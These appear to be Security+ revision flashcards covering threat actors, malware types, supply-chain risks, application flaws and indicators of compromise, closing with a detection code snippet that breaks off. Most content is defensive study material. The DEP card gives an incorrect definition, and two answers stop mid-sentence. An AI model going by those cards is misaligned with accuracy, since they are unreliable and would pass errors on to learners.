Threat, Vulnerabilities and Mitigations: Quiz Revision Flashcards

1
Q

Which of the following network attacks has the goal of capturing a user’s login information to use in a subsequent attack?

A) Amplified
B) Credential replay
C) On-path
D) Reflected

A

A credential replay attack uses intercepted credentials to initiate an attack. An attacker will monitor the conversation between Benjamin and George and capture the credentials of George. Later, the attacker initiates a conversation with Benjamin. When challenged for credentials by Benjamin, the attacker supplies George’s credentials, and Benjamin allows the conversation to continue.

2
Q

What is a reflected attack?

A

Reflected attacks are Distributed Denial of Service (DDoS) attacks. Reflected DDoS attacks use spoofed IP addresses to send excessive traffic to targets. The attacker makes multiple requests for information from a server, using the spoofed IP address of a victim. The victim is then overwhelmed with response traffic from the server.

3
Q

What is an on-path attack?

A

An on-path (formerly known as man-in-the-middle) attack occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver. This type of attack often involves interrupting network traffic to insert malicious code.

4
Q

What is an amplified attack?

A

Amplified attacks are often part of a DDoS attack, usually associated with UDP protocols. The goal of this attack is to turn a simple query, such as DNS or NTP, into a flood of responses that overwhelms the victim’s network resources.

5
Q

A user notifies you that a software application displays advertisements while the application is executing. Of which security threat is this an example?

A) spyware
B) virus
C) worm
D) adware

A

Adware is a software application that displays advertisements while the application is executing. A common example is a free mobile app that displays advertisements for other products at the bottom of the screen. Some adware is also spyware that monitors your Internet usage and personal information. Some adware will even allow credit card information theft. The application’s developer may or may not be aware that malicious ads containing spyware are being displayed through the application.

A worm is a program that spreads itself through network connections. Spyware often uses tracking cookies to collect and report on a user’s activities. Not all spyware is adware, and not all adware is spyware. The definition of spyware requires that your activities be monitored and tracked; the definition of adware requires that advertisements be displayed.

A virus is malicious software (malware) that relies upon other application programs to execute itself and infect a system. Another malware that you need to be familiar with is ransomware, which restricts access to a computer that it infects. The ransomware then demands a ransom paid to the creator of the malware for the restriction to be removed.

6
Q

Which threat actor motivation is exemplified by threatening to release sensitive personally identifiable information (PII)?

A) Financial gain
B) Service disruption
C) Blackmail
D) Data exfiltration

A

Blackmail is most commonly accomplished by threatening to release sensitive PII or incriminating evidence regarding an individual. The cyber-criminal targets an individual who has access to certain company assets, such as data, systems, or processes, and then digs into their personal records. The cyber-criminal threatens to expose the individual unless they take some action against a company asset on the criminal’s behalf.

Remember that not all PII is sensitive. While names, addresses, gender, and dates of birth are PII, they are found in many public databases. PII also includes geo-location data, online browsing history, and medical records, which are more likely to be leveraged by a blackmailer.

7
Q

What is service disruption?

A

Service disruption can cause damage to an organization’s reputation, or loss of public confidence in the organization. If an airline had a disruption where a customer could not access its services, such as booking a flight, that customer would likely do business with another airline.

8
Q

What is Data exfiltration?

A

Data exfiltration is the act of sending sensitive or proprietary information to unauthorized recipients external to the organization. Data loss prevention is designed to detect and stop data exfiltration behavior by users. If DLP software is not present, data exfiltration might only be discovered after the event. When it occurs, the best course of action is to identify the source of the disclosure, if possible, and then take disciplinary action against the user.

9
Q

What is financial gain motivation?

A

Financial gain motivation is exemplified by activities such as fraud, ransom attacks, and theft of credit card data. Once the threat actor has your information, they can sell it or use it for fraudulent purposes. When a cyber-criminal threatens to reveal sensitive PII in exchange for money, it is termed extortion, not blackmail.

10
Q

What is Espionage?

A

Espionage – Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

11
Q

What are philosophical or political beliefs as a motivation?

A

Philosophical or political beliefs – Philosophical beliefs and political beliefs are used by extremist groups to recruit members to their cause. One nation might attempt to convince citizens of another nation to perform cyberterrorist activities. Hacktivists are the typical actor here.

12
Q

What are ethical motives?

A

Ethical motives – Ethical hackers (sometimes called white-hat hackers or penetration testers) are individuals hired by the company to test the company’s security infrastructure. Their purpose is to conduct activities to find weaknesses and “break in”. The ethical hacker will prepare a report detailing the weaknesses so that the client company can address those issues and make corrections. They may be mistaken for threat actors by the company’s in-house team during a closed penetration test.

13
Q

What is revenge motivation?

A

Revenge – threat actors can be motivated by revenge. Revenge and retaliation result from the perception that the threat actor has been slighted by a person or organization. The threat actor wants to “teach them a lesson” or exact revenge.

14
Q

What is the disruption and chaos motivation?

A

Disruption/Chaos – Some threat actors simply want to cause disruption and chaos. A threat actor might be motivated to gain notoriety by claiming responsibility for a disruptive event. The end goal is to upset normal operations in an attention-getting way.

15
Q

What is the war motivation?

A

War – Civilians and nation-states can use cyberspace to advance wartime agendas. Each may engage in activities that disrupt a target’s communications, services, and infrastructure, or that spread propaganda, misinformation, and fear.

16
Q

Which of the following supply chain elements are threat vectors? (Choose all that apply.)

A) Third-party software dependencies
B) Managed service providers
C) Hardware suppliers
D) Software suppliers

A

Managed service providers (MSPs), software and hardware suppliers, and third-party software dependencies are all threat vectors in the supply chain. A supply-chain attack is not an attack on a target directly, but on a more vulnerable company or resource that helps the target organization conduct its business or create a product. By infiltrating the target’s supply chain, the attackers can gain access to internal systems or data through the compromised components.

Managed Service Providers (MSPs) are highly susceptible to supply chain attacks. MSPs provide IT services to other organizations, and may have access to data from their clients. When an organization announces that they are outsourcing a certain aspect of their business, they are outsourcing to an MSP. An MSP may provide any combination of a number of services, such as help desk services, tech support, software updates, data backup, and even payroll services. When an attacker targets an MSP, they potentially have access to multiple clients of that MSP. The most well-known supply chain attack involving an MSP was the SolarWinds attack of 2020. Attackers may also disable access to a third-party managed service, as in the United Healthcare billing service attack of 2024.

Software suppliers include cloud-based SaaS providers and application vendors. Software provider vulnerabilities occur in third-party companies that provide software to other companies (customers). Attackers will look for a vulnerability within the software that the attacker can exploit. Then, when the customer installs the software, the customer’s data is exposed to the attacker, or the attacker is able to install more malicious software into the customer’s system to establish a foothold.

Third-party software dependencies refer to the external libraries, frameworks or components that integrate with an organization’s existing software or that were used to build third-party software. These external items add functionality, or perhaps assist with further development. Issues to consider with third-party software include the possibility of malicious components, lack of transparency from the vendor, and supply chain attacks on vulnerable components.

17
Q

What are some of the strict audit controls to avoid supply chain attacks?

A

All vendors in the supply chain should be under strict audit controls. Some recommended best practices to mitigate supply-chain attacks include:

Monitor third-party service providers’ access to sensitive data.

Make an inventory of all data exposed to the supply chain.

Request the source code and a list of all components used to build a vendor’s software.

Include security requirements and a right-to-audit in all contracts with managed service providers, software providers, and hardware suppliers.

Use automated supply-chain management tools to continually monitor for and remediate known vulnerabilities and audit behavior.

Have a formal procedure for offboarding old vendors and removing their access to internal systems.

18
Q

What are some of the hardware supply chain attacks?

A

Hardware provider vulnerabilities occur in device manufacturers and suppliers. A classic example is the Target breach in 2013. Target’s HVAC hardware provider was compromised, and through the HVAC provider, attackers accessed Target’s payment system and stole millions of credit card numbers from Target’s customers. Other hardware-based supply chain attacks could include:

Selling counterfeit equipment through an unauthorized channel
Tampering with legitimate equipment before it is delivered to the target
Using uncertified third-party components while manufacturing the hardware
Allowing off-site personnel to install hardware without supervision

To mitigate these risks, organizations should only buy hardware from authorized resellers or the manufacturer, inspect hardware for signs of tampering, supervise vendor personnel during equipment installation, and request that vendors certify the hardware and its components.

19
Q

Which of the following malware attacks is actually a collection of unwanted or unnecessary programs installed on a system?

A) Keylogger
B) Bloatware
C) Rootkit
D) Trojan

A

Bloatware is an umbrella term for all the extra (and usually unwanted) applications that are installed on systems by the manufacturers. Many of these extra applications are harmless, and some of these applications may be bundled in a zip file. When you install from the zip file, you also install all the extra applications which may include things like browser hijackers, adware and even spyware.

20
Q

What is a keylogger?

A

Keyloggers capture the keystrokes made on the keyboard and send them to the attacker. While a keylogger can be a physical device, it is more often a software application. The keylogger records the keystrokes made by users to a file, which can be transmitted in real time or at a time of the attacker’s choosing.

21
Q

What is a Trojan?

A

A Trojan is malware: malicious content that appears to be something beneficial or legitimate. The user is tricked into downloading and installing the content, or into clicking a link that is actually an executable. The name “Trojan” comes from the ancient Greek story of the Trojan Horse.

22
Q

What is a rootkit?

A

A rootkit is a type of malware that allows attackers to have administrative access through a backdoor. Once an attacker has gained access, the rootkit may have the capability of erasing its tracks. Rootkits are particularly dangerous, since the administrative access allows the attacker to change system-level files including the Registry.

23
Q

You have several independent security monitoring solutions, each with different logging mechanisms. You are concerned that they are not working well together, and that the separate logs may not present all the necessary information. In addition, the costs of maintaining the separate products are rising. You need to provide a centralized solution that will include centralized logging. What could you replace them with?

A) Patch management tools
B) Host-based firewall
C) DLP
D) UTM

A

Unified Threat Management (UTM) incorporates several threat management devices and systems into one appliance. The biggest advantage to a UTM from an analysis standpoint is that all the logs are in one place, as opposed to checking multiple systems. In addition, a UTM would cut down on the costs associated with maintaining separate products.

24
Q

What are HIPS and HIDS used for?

A

HIDSs and HIPSs have two different functions. Host-based Intrusion Detection Systems (HIDS) provide an alert in the event of a breach on a single server or computer. Host-based Intrusion Prevention Systems (HIPS) go a step further and stop the attack. An example would be shutting down port 80 when HTTP traffic exceeds the baseline norm. With either product, it is important to review the log entries generated and interpret the results based on the documentation provided by the HIPS/HIDS vendor. A host-based system will not monitor network traffic for threats.

25
Q

Are antivirus products a one-stop shop against threats?

A

Antivirus products (and the antimalware products that encompass them) provide notifications when a threat has been detected, and what action was taken. On many occasions, the software will identify a potential threat, and prompt you for what action to take. Antivirus is not a centralized solution for security; it is only one part of the solution.

26
Q

What do patch management tools assist with?

A

Patch management tools assist with the installation of patches, which can present a significant challenge to an enterprise environment. Their logs will contain successful and failed updates, incompatible patches, and unsuccessful patch installations, but no other security logging information.

27
Q

What are the features of Host-Based firewalls?

A

Host-based firewalls include products that are installed as an application, or included in the OS, such as the Windows Firewall. In the case of Windows Firewall, it is possible to have the firewall activated, but not generating log entries. You can activate logging by going into the console, choosing Actions, then Properties. The logging can be set as seen below. It is important to review the documentation that accompanies the application to interpret the results. Firewall logs display traffic that has been allowed and denied passage through the firewall, but not logs from other security systems, such as antimalware tools.

28
Q

What are the security technologies and their output?

A

For the Security+ exam, you also need to understand other security technologies and their output, including file integrity checks, application allow listing, removable media control, DEP, WAFs, DLP, UTM, and advanced malware tools.

29
Q

What do file integrity checks do?

A

File integrity checks examine selected files to see if there have been any changes, or attempted changes. It is important to review the logs to know when attempts have been made, even if the file integrity product returned the file to the original state.

30
Q

What are the functions of an application allow list?

A

An application allow list is the practice of denying all applications except those that are approved. Those approved applications are designated as on the allow list. Several products are available that check for applications that are not on the allow list, including attempts to install those applications. The logs the allow list product generates would tell you if someone had attempted (for example) to install a keylogger.

Removable media control (RMC) is important in many environments. USB drives, SD cards, CDs, DVDs and Blu-ray devices can all present dangers to the system. As an example, someone can use a USB drive to copy sensitive information and deliver it to someone outside the organization. Another example could be a CD that appears to be a music CD but is actually installation media for unauthorized software. Examine the RMC logs to determine attempts to violate removable media policies.

31
Q

What do advanced malware tools check for?

A

Advanced malware tools check for malicious code that would otherwise slip by standard antivirus and antimalware tools.

32
Q

What does DLP examine?

A

Data Loss Prevention (DLP) examines outbound traffic for sensitive data, keywords, and specific files leaving the organization.

33
Q

What does DEP do?

A

Data execution prevention (DEP) forces the user to approve an application before it executes or launches. Logs will record execution attempts, including failed attempts. Notification of failed attempts is important, as it could tell you that your antimalware application successfully blocked an attempt to install malware.

34
Q

What is a web application firewall?

A

A web application firewall uses a set of defined rules to manage incoming and outgoing web server traffic, as well as to prevent attacks. Organizations can define their own rules, based on their particular vulnerabilities.

35
Q

Recently, while reviewing log data, you discover that a hacker has used a design flaw in an application to obtain unauthorized access to the application. Which type of attack has occurred?

A) backdoor
B) privilege escalation
C) maintenance hook
D) buffer overflow

A

An escalation of privileges attack occurs when an attacker has used a design flaw in an application to obtain unauthorized access to the application. Privilege escalation includes incidents where a user logs in with valid credentials and then takes over the privileges of another user, or where a user logs in with a standard account and uses a system flaw to obtain administrative privileges.

There are two types of privilege escalation: vertical and horizontal. With vertical privilege escalation, the attacker obtains higher privileges by performing operations that allow the attacker to run unauthorized code. With horizontal privilege escalation, the attacker obtains the same level of permissions as they already have but uses a different user account to do so.

36
Q

What does the term backdoor mean?

A

A backdoor is a term for lines of code that are inserted into an application to allow developers to enter the application and bypass the security mechanisms. Backdoors are also referred to as maintenance hooks.

37
Q

What is a buffer overflow involved in?

A

A buffer overflow occurs when an application erroneously allows an invalid amount of input in the buffer. It can be used to perform a denial-of-service (DoS) attack or a Distributed Denial-of-Service (DDoS) attack.

38
Q

What is a race condition as an application issue?

A

Race condition – typically targets timing, mainly the delay between time of check (TOC) and time of use (TOU). To eliminate race conditions, application developers should create code that processes exclusive-lock resources in a certain sequence and unlocks them in reverse order.

39
Q

What are insecure direct object references as an application issue?

A

Insecure direct object references – occur when a developer exposes a reference to an internal object, such as a file, directory, database record, or key, as a URL or form parameter without implementing the appropriate security control. An attacker can manipulate direct object references to access other objects without authorization. Implementing an access control check helps to protect against these attacks.

40
Q

What does CSRF do in terms of application issues?

A

Cross-site request forgery (CSRF) – occurs when a malicious site executes unauthorized commands from a user on a web site that trusts the user. It is also referred to as a one-click attack or session riding. Implementing anti-forgery tokens protects against this attack.

41
Q

What application issue occurs when sensitive data is stored improperly?

A

Improper storage of sensitive data – occurs when sensitive data is not properly secured when it is stored. Sensitive data should be encrypted and protected with the appropriate access control list. Also, when sensitive data is in memory, it should be locked.

42
Q

When does improper error and exception handling occur as an application issue?

A

Improper error and exception handling – occurs when developers do not design appropriate error or exception messages in an application. The most common problem because of this issue is the fail-open security check, which occurs when access is granted (instead of denied) by default. Other issues include system crashes and resource consumption. Error handling mechanisms should be properly designed, implemented, and logged for future reference and troubleshooting.

43
Q

Why is secure cookie storage and transmission so important to avoid application issues?

A

Secure cookie storage and transmission – Cookies store a user’s web site data, often including confidential data, such as usernames, passwords, and financial information. A secure cookie has the secure attribute enabled and is only used via HTTPS, ensuring that the cookie is always encrypted during transmission.

44
Q

What are memory leaks when it comes to application issues?

A

Memory leaks – occur when an application does not release memory after it is finished working with it. Reviewing coding and designing best practices helps to prevent memory leaks.

45
Q

Application Issue: Integer Overflow?

A

Integer overflows – occur when an operation attempts to store an integer that is too large for the register or variable. The best solution is to use a safe integer class that has been built to avoid these problems.

46
Q

Application Issue: Geo-Tagging?

A

Geo-tagging – occurs when media, such as photos or videos, are tagged with geographical information. Turning off the geo-tagging feature on your device protects against releasing this type of information. It is also possible to remove geo-tagging information from media before using it in an application or web site.

47
Q

Application issue: Data Remnants?

A

Data remnants – occur when applications are removed but data remnants, including registry entries, are left behind. Specialty tools and apps are available to ensure that applications have been completely removed from a device.

48
Q

You have recently been hired as a network administrator. The CIO informs you that their wireless networks are protected using firewalls. He has asked that you implement MAC filtering on all access points. What is the purpose of using this technology?

A) to provide port authentication for a wireless network
B) to ensure that unused ports are not accessible by clients
C) to restrict the clients that can access a Web site
D) to restrict the clients that can access a wireless network

A

The purpose of MAC filtering is to restrict the clients that can access a wireless network. Access is restricted based on the client’s media access control (MAC) address, which is the unique identifier that is encoded on the network interface card (NIC).

MAC filtering is not used to restrict the clients that can access a Web site. This is most often done using access control lists (ACLs).

802.1X (or WPA2-Enterprise) provides port authentication for a wireless network using Extensible Authentication protocol (EAP). 802.1X can use Protected EAP (PEAP) or Lightweight EAP (LEAP). PEAP is the more secure of the two. Both of these implementations require a server certificate on the RADIUS server. If the RADIUS server certificate expires, then clients will be unable to connect until the RADIUS server obtains a new certificate.

To ensure that unused ports are not accessible by clients, you should disable all unused ports.

49
Q

How do you increase network security in a wireless network?

A

To increase network security, you should use the following mitigation and deterrent techniques:

MAC limiting and filtering
802.1X
Disable unused interfaces, applications, and services.
Rogue machine detection

You should always monitor system logs, including the audit logs, event logs, security logs, and access logs. Often by monitoring these logs, a security professional can discover issues or attacks and can take measures to prevent the issues.

Security professionals should understand an organization’s security posture. Security professionals should perform certain mitigation and deterrent activities including recording an initial baseline configuration, continually monitoring security, and performing remediation as necessary.

You should also ensure that a good reporting system is set up to notify appropriate personnel if certain actions occur. This reporting system should include alarms and alerts. Security professionals should also perform periodic trending analysis to identify any new organizational trends.

Mitigation controls help to mitigate security issues. Deterrent controls help to deter attacks. Prevention controls help to prevent attacks. Detective controls help to detect any attack when it occurs. Any security policy should employ all of these types of controls to be most effective. Cameras and intrusion detection systems (IDSs) are detective controls. Intrusion prevention systems (IPSs) and guards are preventive controls.

50
Q

A remote employee has a history of logging into the system every day between 8:50 AM and 9:05 AM. Today, the employee logs in at 3 AM. What does this exemplify?

A) Out-of-cycle logging
B) Resource inaccessibility
C) Published/documented
D) Missing logs

A

Out-of-cycle logging is when an event that normally occurs and is recorded at a regular time or interval shows up in the log as having occurred at an odd time or off-cycle. While it’s normal to see the event, it appears at a strange time, signaling that an attack may be underway.

51
Q

What are the signs of Resource inaccessibility?

A

Resource inaccessibility is an indicator of malicious activity. For example, if a web server goes down and is suddenly inaccessible, it might be the victim of a Denial of Service (DoS) attack.

52
Q

What happens when published/documented indicators are used?

A

Published/documented indicators are those that have been recently discovered and subsequently published by threat feed organizations such as the Cybersecurity and Infrastructure Security Agency (CISA). These indicators may include things like IP addresses, file hashes like MD5, and domain names. By knowing what to look for, this information can be used to uncover and respond to attacks.

53
Q

What may missing logs be a sign of?

A

Missing logs may be a sign that an attack has been attempted or has occurred, and that the attacker has erased the log to cover their tracks. Log files are a critical tool for monitoring activities, investigating problems, and storing information about the health of the system and the network. Consequently, many organizations will store the log files on a separate device or server in a protected area of the network.

54
Q

Which of the following mitigation techniques would include establishing, deploying, and then maintaining a standard configuration, such as an image?

A) Removal of unnecessary software
B) Decommissioning
C) Installation of endpoint protection
D) Configuration enforcement

A

Configuration enforcement includes establishing, deploying, and then maintaining a standard configuration, such as a naming convention or even a system image. You could have an image based on a device/OS pair, an image for each of several user groups, or images for departments throughout the organization. Once the proper configuration has been established and preserved as a system image, configuration enforcement looks for changes to that configuration and, in some cases, even reverts the system to the proper configuration.

55
Q

Why is decommissioning so important?

A

Decommissioning is a mitigation technique used when a system or device is no longer of use to the organization. Contrary to what many users assume, deleting files into the recycle bin is not a secure process. When a system or device has reached the end of its service life, storage media and drives must be sanitized, either through physical destruction or with tools that erase all traces of data on the device, such as degaussing for magnetic media. Note that degaussing does not work on solid-state drives, which require a firmware secure-erase or destruction.

56
Q

What is the removal of unnecessary software associated with?

A

Removal of unnecessary software is associated with system hardening. System hardening increases the security of a server or a computer system by reducing vulnerabilities and the attack surface. Other examples of system hardening activities include closing down ports and adjusting permissions.

57
Q

What does endpoint security involve?

A

Endpoint security is the practice of protecting the endpoints (workstations, printers, etc.) in the network, including endpoints that spend at least some of their time outside the LAN. A common control is verifying that a device has the required patches and updates before it is allowed access to the network. Endpoint security also includes hardening the endpoints themselves. It does not, however, redirect traffic from a device being flooded to a location where the traffic can be analyzed; that is a network-level mitigation, not an endpoint one.

58
Q

Which of the following is not a vulnerability associated with the supply chain?

A) Service provider
B) TPM
C) Software provider
D) Hardware provider

A

Trusted Platform Module (TPM) is not a supply chain vulnerability. A TPM and a Hardware Security Module (HSM) are both hardware components that perform cryptographic operations and protect keys. The main difference is that a TPM is a chip mounted on (or built into) the motherboard, whereas an HSM is a separate device, typically a PCIe adapter card or a network-attached appliance.

Supply chain vulnerabilities include the service provider, the hardware provider, and the software provider.

Hardware provider vulnerabilities occur in device manufacturers and suppliers. The classic example is the Target breach in 2013: attackers stole network credentials from Target's HVAC vendor and, using that vendor's access, reached Target's payment systems and stole millions of credit card numbers from Target's customers.

Software provider vulnerabilities occur in third-party companies that provide software to other companies (customers). Attackers will look for a vulnerability within the software that the attacker can exploit. Then, when the customer installs the software, the customer

Service provider vulnerabilities can occur with a company that provides you with services, such as when you outsource your payroll processing or billing. If the service provider is compromised, the attacker can access and exploit the customer data.

59
Q

Which threat actor type can be characterized by an unsophisticated skill level, the use of widely available tools, and is motivated by the need to prove their skills?

A) Hacktivist
B) Shadow IT
C) Insider
D) Unskilled attacker
E) Competitor

A

Unskilled attackers (sometimes referred to as script kiddies) typically rely on tools that are widely available on the Internet. These unskilled attackers are often motivated by the thrill of the chase and by the need to prove that they can do it. For the most part, they have limited time and financial resources.

60
Q

What is Shadow IT?

A

Shadow IT consists of IT applications, systems, and resources (such as cloud services) that are installed or used by internal staff without the knowledge or consent of the IT department. Because it is neither authorized nor approved, shadow IT poses a risk to the organization's security posture, risk management, data integrity, and regulatory compliance.

61
Q

What is a hacktivist?

A

Hacktivists are activists who use hacking techniques to promote their own political or social agenda. Their activities can cause DoS and DDoS attacks, or place embarrassing posts on the web sites or social media sites of an organization with opposing views. They often believe they are engaging in a righteous and morally correct cause, even if their activities are illegal. As with unskilled attackers, hacktivists often have limited time and financial resources. However, a hacktivist within a sophisticated or large organization may have access to significant resources.

62
Q

What are insider attacks?

A

Insider attacks are perpetrated by people within the organization. Insider threats have many possible motives, including promotion of an activist agenda, monetary reward, retaliation for not being selected for a promotion, or some other situation that caused the insider to become disgruntled with the organization. They typically have limited resources, but because they may already have substantial knowledge of the organization and its network, they are particularly dangerous.

63
Q

What are competition attacks?

A

Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

64
Q

What are Organized Crime Attacks?

A

Organized crime attacks are carried out by criminal groups for the sole purpose of monetary gain. Organizations like the Mafia, Russian organized crime, and drug cartels have significant resources in terms of time and money to recruit hackers to carry out their agenda.

65
Q

What are nation-state attacks?

A

Nation-state / Advanced Persistent Threat (APT) attacks are large, coordinated campaigns conducted by one nation against another, or against a significant entity within the target country. APT attackers have very significant time and financial resources. Motives can be financial, political, disruption of the economy, or theft of intellectual property such as military secrets.

66
Q

Which of the following begins with the attacker creating a fake patch?

A) SQL injection
B) Cross-site scripting
C) Malicious update
D) Memory injection

A

Malicious update is when an attacker first creates a fake software update, containing malware, that appears to be legitimate, and then gets users to download and install the update. Upon installation, the malware is activated on the system.

67
Q

What is memory injection?

A

Memory injection is the usual goal of a buffer overflow attack. A buffer overflow writes more data into an allocated area of memory than it can hold, so the excess overwrites adjacent memory. With memory injection, the attacker places malicious code into the program's memory and redirects execution to it, so the computer runs that code as if it were part of the program.

68
Q

What is an SQL injection?

A

A SQL injection is an example of improper input handling; its impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection characters and, more importantly, passed to the database as query parameters rather than concatenated into the SQL statement. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.

69
Q

What are cross-site scripting (XSS) attacks?

A

A cross-site scripting (XSS) attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious script into a web application. A persistent (stored) XSS attack occurs when data provided to the web application is first stored on the server and later displayed to users without being HTML-encoded. A non-persistent (reflected) XSS attack occurs when data provided by a web client is used immediately by server-side code to generate the response for that user. XSS flaws arise whenever an application takes user-supplied data and sends it to a browser without first validating or encoding it.

70
Q

You are considering cloud services, and you are concerned about the interaction of your security policies and those of the hosting provider. What can alleviate your concern?

A) Stress testing
B) VM escape protection
C) Cloud access security brokers
D) VDI

A

Cloud access security brokers would alleviate your concern because they enforce security policies, whether on-premises or cloud-based. They often sit between the cloud service users and providers, merging the security policies of the user and the provider. Virtual desktop infrastructure (VDI) creates a user desktop on a virtual machine that is hosted on a data center server. Desktops can be personalized while still having centralized management and security.

71
Q

What does VDI strengthen and mitigate?

A

The virtual desktop environment (VDE) maintains everything related to the user desktop centrally and delivers it to the host. Virtual desktop infrastructure (VDI) can make your desktops either more secure or less so. Storing data on VDI servers in the data center is more secure than storing it locally on the user's machine, and administrators have greater control over desktop and application distribution in a VDI environment. VM escape protection can be supported by sandboxing: if a virtualized application crashes or is compromised, the sandbox contains it and does not allow its data to "escape" into another application. VM escape itself occurs when an attacker exploits a vulnerability in the hypervisor, or in the virtual hardware it exposes to the guest, to run malicious code outside the boundaries of the VM.

72
Q

What does stress testing involve?

A

Stress testing puts a load on the system much higher than what is normally expected. For example, testing a website with 100x the normal amount of traffic would identify how the system will respond to the stress. Stress testing does not reveal security weaknesses between the interactions of your security policies with those of the hosting provider.

73
Q

What is the difference between a hosted solution, a cloud solution, and an on-premises solution?

A

Choosing between an on-premises solution versus a hosted solution versus a cloud solution are all virtualization decisions. On-premises virtual machines (VMs) are stored at your physical location. The hosted model allows you to contract with a third party for virtual access, and the responsibilities of the third party are detailed in a service level agreement (SLA). Cloud systems, while closely related to hosted models, have requirements such as on-demand self-service, broad network access, resource pooling, rapid elasticity and measured service, as defined by NIST.

74
Q

Management is concerned that mobile device location information can be revealed to attackers. Which mobile device feature should you investigate?

A) allow listing
B) remote wiping
C) geotagging
D) screen lock

A

Geotagging is the process of attaching location information, in the form of geographical metadata, to digital media such as web pages, videos, and photographs. Geotagging is a security concern because it can reveal location information. On a mobile device, the camera embeds this metadata (for example, EXIF GPS tags) in each picture, recording the longitude/latitude of where the picture was taken; the data is not visible in the image itself. Geotags may also be applied to digital output and communications such as tweets or status updates on social media.

The information included in a geotag may include place coordinates (latitude and longitude), bearings, altitude, distances, or even place names. This feature becomes a serious concern when it comes to protecting your privacy and data. Geotagging can give enough information about your current whereabouts (and where you’re not) which can allow thieves to target your home or workplace in your absence.

75
Q

What considerations do you need to make when installing an application on a mobile device?

A

When considering applications that can be installed on mobile devices, you need to understand the following concepts for the Security+ exam:

Key management – You should take measures to ensure that all keys are protected. Measures that you can use include implementing device encryption to protect the keys while stored and using IPSec to protect the keys during transmission.
Credential management – You should implement solutions that allow you to manage credentials for users to ensure that mobile devices are only accessed by valid users. In addition, you should ensure that the protocols that you use do not transmit credential information in plaintext.

Authentication – If possible, you should require your mobile applications to authenticate users before allowing access. This ensures that applications are only accessed by valid users.
Encryption – Applications often request personally identifiable information (PII) that should be protected. In addition, they often transmit PII and other confidential information. Therefore, you should employ encryption to protect the data in storage and in transmission.

Transitive trust/authentication – Transitive trust occurs when federated user identities allow users to access multiple applications, devices, and resources using a single authentication. A trusted computing base is established as the basis of federated user identity. Enterprises should ensure that any entities allowed into the trusted computing base are fully protected.

When deploying mobile devices securely, security professionals need to set policies and enforce them through monitoring all of the following features or practices: Third-party app stores, rooting/jailbreaking, sideloading, custom firmware, carrier unlocking, firmware over-the-air (OTA) updates, camera use, SMS/MMS, external media, USB on-the-go (OTG), recording microphones, GPS tagging, Wi-Fi direct/ad hoc, tethering, and payment methods. Management should set the policy for each of these mobile device components. Policies are only effective if a plan for enforcement and monitoring is also established.

76
Q

You need to ensure that corporate users understand the different types of malware they will encounter. Match the descriptions on the left with the malware types on the right.

Backdoor - a program that infects a system under the guise of another legitimate program

Logic bomb - a developer hook in a system or application that allows developers to circumvent normal authentication

Spyware – a program that executes when a certain predefined event occurs

Trojan horse - a program that monitors and tracks user activities

A

The malware types should be matched with the descriptions in the following manner:

Backdoor – a developer hook in a system or application that allows developers to circumvent normal authentication

Logic bomb – a program that executes when a certain predefined event occurs

Spyware – a program that monitors and tracks user activities

Trojan horse – a program that infects a system under the guise of another legitimate program

77
Q

Your organization has a contract to provide networking services to a government agency. You are required to use certified hardware to build a secure network. Which of the following practices will help you avoid adversarial threats in the supply chain? (Choose all that apply.)

A) Inspect hardware for signs of tampering

B) Have a legally enforceable purchase order with the hardware vendor

C) Integrate supply chain management into the overall risk management framework

D) Request proof of equipment certification from hardware vendors

E) Only purchase hardware from authorized vendors or resellers

F) Source hardware from multiple vendors in case natural disasters disrupt availability

A

NIST defines cybersecurity risks throughout the supply chain as “the potential for harm or compromise that may arise from suppliers, their supply chains, their products, or their services” (NIST SP 800-161r1). Among the recommended techniques for minimizing adversarial threats from hardware purchases, you should:

Only purchase hardware from authorized vendors or resellers

Integrate supply chain management into the overall risk management framework

Inspect hardware for signs of tampering

Request proof of equipment certification from hardware vendors
Conduct a supply chain analysis and audit the existing supply chain
Have an inventory management system that includes asset tracking and secure disposal

Natural disasters are a threat to the supply chain, but they are not an adversarial threat. Adversarial threats arise from a human vector, such as malicious insiders, organized crime, and nation-states.

A legally enforceable purchase order with a hardware vendor will not protect your organization from hardware that has been tampered with once it left the vendor’s direct control. Hardware should be inspected for missing or broken seals, opened boxes, refurbished components, or counterfeit components.

78
Q

A user supplies the proper credentials and logs in to a remote system from an offsite location in New York. Moments later, the same credentials are used to log in from a different offsite location, this time Tokyo. What type of Indicator of Compromise (IoC) does this represent?

A) Resource consumption
B) Impossible travel
C) Blocked content
D) Concurrent session usage

A

Impossible travel is when a user logs in from one location, and then moments later logs in from another location, but it would have been impossible for the user to have traveled between the two locations in that time frame. An example would be a user who logs on in New York, then 20 seconds later the same user logs on in Tokyo.

Blocked content can also be an IoC. For example, a block could result from a filter on a firewall finding malicious code, or it could be

Resource consumption occurs with events like filling all the space on a drive or using all the bandwidth on a network.

79
Q

What is a concurrent session?

A

Concurrent session usage happens when you have two or more instances of a user account logged in at the same time, when there should be only one instance of that user login. This could happen with the same system or different systems. The key factor here is that it would be unexpected for the user to login multiple times. A user with a Gmail account open on several devices simultaneously would not be a concurrent session usage IoC.
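An added example (not part of the flashcards) that turns the two IoCs above, impossible travel and concurrent session usage, into detection logic over a handful of constructed login events. The events, the city coordinates, and the 1000 km/h threshold are assumptions made for the illustration; in practice the coordinates would come from an IP geolocation lookup and the threshold from policy.

```python
"""Detect impossible-travel and concurrent-session indicators in login events.

Added example, not from the flashcards. The login records are constructed;
the latitude/longitude of each event is assumed to have been supplied by an
IP-geolocation lookup performed earlier in the pipeline.
"""
import math
from datetime import datetime, timedelta

# Constructed login events: (user, ISO timestamp, city, latitude, longitude, session_id)
LOGINS = [
    ("alice", "2024-05-01T09:00:00", "New York", 40.7128, -74.0060, "s1"),
    ("alice", "2024-05-01T09:00:20", "Tokyo",    35.6762, 139.6503, "s2"),
    ("bob",   "2024-05-01T08:00:00", "New York", 40.7128, -74.0060, "s3"),
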